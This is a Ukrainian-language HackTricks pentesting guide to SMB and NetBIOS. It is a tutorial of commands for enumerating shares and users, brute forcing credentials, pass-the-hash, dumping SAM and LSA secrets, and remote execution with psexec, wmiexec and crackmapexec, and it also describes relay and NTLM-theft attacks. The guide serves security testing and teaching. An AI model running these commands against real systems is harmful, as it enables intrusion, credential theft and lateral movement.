hacktricks/network-services-pentesting/pentesting-smb
2024-09-04 13:38:57 +00:00
..
README.md Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:49:31 +00:00
rpcclient-enumeration.md Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:38:57 +00:00

139,445 - Pentesting SMB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Порт 139

Система базового вводу-виводу мережі** (NetBIOS)** — це програмний протокол, розроблений для забезпечення взаємодії додатків, ПК та робочих станцій у локальній мережі (LAN) з мережевим обладнанням та сприяння передачі даних через мережу. Ідентифікація та розташування програмних додатків, що працюють у мережі NetBIOS, здійснюється через їхні імена NetBIOS, які можуть мати до 16 символів у довжину і часто відрізняються від імені комп'ютера. Сесія NetBIOS між двома додатками ініціюється, коли один додаток (який діє як клієнт) віддає команду "викликати" інший додаток (який діє як сервер), використовуючи TCP порт 139.

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

Port 445

Технічно, порт 139 називається «NBT over IP», тоді як порт 445 ідентифікується як «SMB over IP». Абревіатура SMB означає «Server Message Blocks», яка також сучасно відома як Common Internet File System (CIFS). Як протокол мережевого рівня додатків, SMB/CIFS в основному використовується для забезпечення спільного доступу до файлів, принтерів, послідовних портів та полегшення різних форм комунікації між вузлами в мережі.

Наприклад, у контексті Windows підкреслюється, що SMB може працювати безпосередньо через TCP/IP, усуваючи необхідність у NetBIOS через TCP/IP, за допомогою використання порту 445. Навпаки, на різних системах спостерігається використання порту 139, що вказує на те, що SMB виконується разом з NetBIOS через TCP/IP.

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Протокол Server Message Block (SMB), що працює за моделлю клієнт-сервер, призначений для регулювання доступу до файлів, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. Переважно використовується в серії операційних систем Windows, SMB забезпечує зворотну сумісність, дозволяючи пристроям з новішими версіями операційної системи Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект Samba пропонує безкоштовне програмне забезпечення, що дозволяє реалізувати SMB на системах Linux та Unix, тим самим полегшуючи крос-платформену комунікацію через SMB.

Спільні ресурси, що представляють произвольні частини локальної файлової системи, можуть надаватися сервером SMB, що робить ієрархію видимою для клієнта частково незалежною від фактичної структури сервера. Списки контролю доступу (ACLs), які визначають права доступу, дозволяють точний контроль над дозволами користувачів, включаючи атрибути, такі як execute, read та full access. Ці дозволи можуть бути призначені окремим користувачам або групам, залежно від спільних ресурсів, і відрізняються від локальних дозволів, встановлених на сервері.

IPC$ Share

Доступ до спільного ресурсу IPC$ можна отримати через анонімну нульову сесію, що дозволяє взаємодіяти з сервісами, які відкриті через іменовані канали. Утиліта enum4linux корисна для цієї мети. Правильне використання дозволяє отримати:

  • Інформацію про операційну систему
  • Деталі про батьківський домен
  • Зведення локальних користувачів та груп
  • Інформацію про доступні SMB спільні ресурси
  • Діючу політику безпеки системи

Ця функціональність є критично важливою для мережевих адміністраторів та фахівців з безпеки для оцінки безпекової позиції служб SMB (Server Message Block) в мережі. enum4linux надає всебічний огляд середовища SMB цільової системи, що є суттєвим для виявлення потенційних вразливостей та забезпечення належного захисту служб SMB.

enum4linux -a target_ip

Вищезазначена команда є прикладом того, як enum4linux може бути використаний для виконання повної енумерації проти цілі, вказаної за допомогою target_ip.

Що таке NTLM

Якщо ви не знаєте, що таке NTLM, або хочете дізнатися, як він працює і як його зловживати, вам буде дуже цікава ця сторінка про NTLM, де пояснюється як працює цей протокол і як ви можете скористатися ним:

{% content-ref url="../../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}

Енумерація сервера

Сканування мережі в пошуках хостів:

nbtscan -r 192.168.0.1/24

SMB сервер версія

Щоб шукати можливі експлойти для версії SMB, важливо знати, яка версія використовується. Якщо ця інформація не з'являється в інших використовуваних інструментах, ви можете:

  • Використати MSF допоміжний модуль _auxiliary/scanner/smb/smb_version
  • Або цей скрипт:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

Пошук експлойтів

msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

Можливі облікові дані

Ім'я користувача(ів) Звичайні паролі
(порожньо) (порожньо)
гість (порожньо)
Адміністратор, admin (порожньо), пароль, адміністратор, admin
arcserve arcserve, backup
tivoli, tmersrvd tivoli, tmersrvd, admin
backupexec, backup backupexec, backup, arcada
test, lab, demo пароль, test, lab, demo

Брутфорс

Інформація про середовище SMB

Отримати інформацію

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

Перерахунок користувачів, груп та увійшлих користувачів

Цю інформацію вже слід зібрати з enum4linux та enum4linux-ng

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

Перерахувати локальних користувачів

Impacket

lookupsid.py -no-pass hostname.local

Oneliner

for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - Перерахувати локальних користувачів

use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run

Перерахунок LSARPC та SAMR rpcclient

{% content-ref url="rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}

GUI з'єднання з linux

У терміналі:

xdg-open smb://cascade.htb/

У вікні файлового браузера (nautilus, thunar тощо)

smb://friendzone.htb/general/

Перерахунок спільних папок

Список спільних папок

Завжди рекомендується перевірити, чи можете ви отримати доступ до чогось, якщо у вас немає облікових даних, спробуйте використати null облікові дані/гостевий користувач.

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Підключення/Список спільної папки

#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

Ручне перерахування Windows-спільних ресурсів та підключення до них

Можливо, ви обмежені у відображенні будь-яких спільних ресурсів хост-машини, і коли ви намагаєтеся їх перерахувати, здається, що немає жодних спільних ресурсів для підключення. Тому варто спробувати вручну підключитися до спільного ресурсу. Щоб вручну перерахувати спільні ресурси, ви можете звернути увагу на відповіді, такі як NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME, використовуючи дійсну сесію (наприклад, нульову сесію або дійсні облікові дані). Це може вказувати на те, чи існує спільний ресурс, і ви не маєте до нього доступу, або спільний ресурс взагалі не існує.

Звичайні імена спільних ресурсів для цілей Windows:

  • C$
  • D$
  • ADMIN$
  • IPC$
  • PRINT$
  • FAX$
  • SYSVOL
  • NETLOGON

(Звичайні імена спільних ресурсів з Оцінки безпеки мережі, 3-тє видання)

Ви можете спробувати підключитися до них, використовуючи наступну команду

smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)

для цього скрипта (використовуючи нульову сесію)

#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done

приклади

smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session

Перерахувати спільні ресурси з Windows / без сторонніх інструментів

PowerShell

# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection

CMD консоль

# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all

MMC Snap-in (графічний)

# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc

explorer.exe (графічний), введіть \\<ip>\, щоб побачити доступні неприховані спільні папки.

Підключити спільну папку

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Завантажити файли

Прочитайте попередні розділи, щоб дізнатися, як підключитися з обліковими даними/Pass-the-Hash.

#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Команди:

  • mask: вказує маску, яка використовується для фільтрації файлів у каталозі (наприклад, "" для всіх файлів)
  • recurse: перемикає рекурсію в увімкнене положення (за замовчуванням: вимкнено)
  • prompt: перемикає запит на імена файлів у вимкнене положення (за замовчуванням: увімкнено)
  • mget: копіює всі файли, що відповідають масці, з хоста на клієнтську машину

(Інформація з man-сторінки smbclient)

Пошук спільних папок домену

Snaffler.exe -s -d domain.local -o snaffler.log -v data
  • CrackMapExec павук.
  • -M spider_plus [--share <share_name>]
  • --pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'

Спеціально цікаві з загальних папок файли під назвою Registry.xml, оскільки вони можуть містити паролі для користувачів, налаштованих на автологін через групову політику. Або файли web.config, оскільки вони містять облікові дані.

{% hint style="info" %} SYSVOL share є доступним для читання для всіх автентифікованих користувачів у домені. Там ви можете знайти багато різних пакетних, VBScript та PowerShell скриптів.
Вам слід перевірити скрипти всередині, оскільки ви можете знайти чутливу інформацію, таку як паролі. {% endhint %}

Читання реєстру

Ви можете мати можливість читати реєстр, використовуючи деякі виявлені облікові дані. Impacket reg.py дозволяє вам спробувати:

sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post Exploitation

За замовчуванням конфігурація сервера Samba зазвичай знаходиться в /etc/samba/smb.conf і може мати деякі небезпечні конфігурації:

Налаштування Опис
browseable = yes Дозволити перегляд доступних спільних ресурсів у поточному ресурсі?
read only = no Заборонити створення та модифікацію файлів?
writable = yes Дозволити користувачам створювати та модифікувати файли?
guest ok = yes Дозволити підключення до служби без використання пароля?
enable privileges = yes Враховувати привілеї, призначені конкретному SID?
create mask = 0777 Які дозволи повинні бути призначені новоствореним файлам?
directory mask = 0777 Які дозволи повинні бути призначені новоствореним каталогам?
logon script = script.sh Який скрипт потрібно виконати під час входу користувача?
magic script = script.sh Який скрипт повинен бути виконаний, коли скрипт закривається?
magic output = script.out Де потрібно зберігати вихідні дані магічного скрипта?

Команда smbstatus надає інформацію про сервер та про те, хто підключений.

Authenticate using Kerberos

Ви можете автентифікуватися в kerberos за допомогою інструментів smbclient та rpcclient:

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

Виконати команди

crackmapexec

crackmapexec може виконувати команди зловживаючи будь-яким з mmcexec, smbexec, atexec, wmiexec, при цьому wmiexec є за замовчуванням методом. Ви можете вказати, який варіант ви віддаєте перевагу, за допомогою параметра --exec-method:

apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash

psexec/smbexec

Обидва варіанти створять нову службу (використовуючи \pipe\svcctl через SMB) на машині жертви і використовують її для виконання чогось (psexec завантажить виконуваний файл до ADMIN$ спільного доступу, а smbexec вказуватиме на cmd.exe/powershell.exe і передаватиме в аргументах корисне навантаження --безфайлова техніка--).
Більше інформації про psexec та smbexec.
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/

#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash

Використовуючи параметр-k, ви можете аутентифікуватися за допомогою kerberos замість NTLM

wmiexec/dcomexec

Сховано виконайте командний оболонку, не торкаючись диска або не запускаючи нову службу, використовуючи DCOM через порт 135.
У kali він розташований у /usr/share/doc/python3-impacket/examples/

#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

Використовуючи параметр -k, ви можете аутентифікуватися за допомогою kerberos замість NTLM.

#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

AtExec

Виконання команд через Планувальник завдань (використовуючи \pipe\atsvc через SMB).
У kali він знаходиться за адресою /usr/share/doc/python3-impacket/examples/

./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"

Impacket reference

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Брутфорс облікових даних користувачів

Це не рекомендується, ви можете заблокувати обліковий запис, якщо перевищите максимальну кількість спроб

nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name

SMB relay attack

Ця атака використовує набір інструментів Responder для захоплення SMB аутентифікаційних сесій в внутрішній мережі та пересилає їх на цільову машину. Якщо сесія аутентифікації є успішною, вона автоматично перенаправить вас у системну консоль.
Більше інформації про цю атаку тут.

SMB-Trap

Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися до хоста, коли сторінка намагається отримати доступ до деякого контенту через SMB, наприклад: img src="\\10.10.10.10\path\image.jpg"

Це відбувається з функціями:

  • URLDownloadToFile
  • URLDownloadToCache
  • URLOpenStream
  • URLOpenBlockingStream

Які використовуються деякими браузерами та інструментами (такими як Skype)

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

SMBTrap using MitMf

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

NTLM Theft

Схоже на SMB Trapping, розміщення шкідливих файлів на цільовій системі (через SMB, наприклад) може викликати спробу аутентифікації SMB, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструменту, такого як Responder. Хеш потім може бути зламаний офлайн або використаний в SMB relay attack.

Дивіться: ntlm_theft

HackTricks Automatic Commands

Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. SMB stands for Server Message Blocks. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

#These are the commands I run in order every time I see an open SMB port

With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}

Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}